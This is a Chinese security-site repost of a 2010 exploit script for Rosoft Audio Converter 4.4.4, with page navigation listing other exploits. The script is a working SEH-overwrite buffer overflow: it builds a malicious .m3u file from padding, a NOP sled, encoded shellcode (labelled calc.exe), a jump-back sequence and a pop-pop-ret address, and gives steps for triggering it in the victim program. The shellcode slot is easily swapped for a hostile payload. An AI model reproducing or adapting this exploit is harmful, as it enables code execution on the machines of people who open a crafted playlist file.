首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rosoft Audio Converter 4.4.4 Buffer Overflow
来源:vfocus.net 作者:Blake 发布时间:2010-06-18  
# Exploit Title: Rosoft Audio Converter 4.4.4 Buffer Overflow
# Date: June 14, 2010
# Author: Blake
# Software Link: http://www.rosoftengineering.com/freeware/RosoftAudioConverterFree.aspx
# Version: 4.4.4
# Tested on: Windows XP SP3 / Windows 7 Home (change shellcode for Windows 7)
# Instructions: create malicious file, open in audio converter, select save
 
print "\n============================"
print "Rosoft Audio Converter 4.4.4"
print "      Written by Blake      "
print "   Tested on Windows XP SP3 "
print "============================\n"
 
# calc.exe
sc =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
 
buffer = "\x41" * (4083 - len(sc))
nops = "\x90" * 20
near_jmp = "\xe8\xf4\xef\xff\xff"   # jmp back 
next_seh = "\xeb\xf9\x90\x90"  
seh = "\xe7\xb3\x49\x00"    #Found pop eax -  pop ebx -  ret at 0x0049B3E7 [rosoftaudioconverterfree.exe]
junk = "\xCC" * 25000
 
print "[+] Creating malicious .m3u file"
try:
    file = open("blake.m3u","w")
    file.write(buffer + nops + sc + near_jmp + next_seh + seh + junk)
    file.close()
    print "[+] File created"
except:
    print "[x] Could not create file"
 
raw_input("\nPress any key to exit...\n")


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp v5.572 local BOF exploi
·DMSEasy0.9.7 (fckeditor) Arbit
·Netware SMB Remote Stack Overf
·linux/x86 bindport to 31337 wi
·BlazeDVD v5.1 (.plf) Stack Buf
·linux/x86 bindport to 13123 Po
·File Sharing Wizard Version 1.
·linux/x86 execute /bin/sh with
·linux/x86 chmod 777 polymorphi
·linux/x86 cdrom ejecting polym
·linux/x86 chmod("/etc/shadow",
·linux/x86 ssh root@localhost p
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved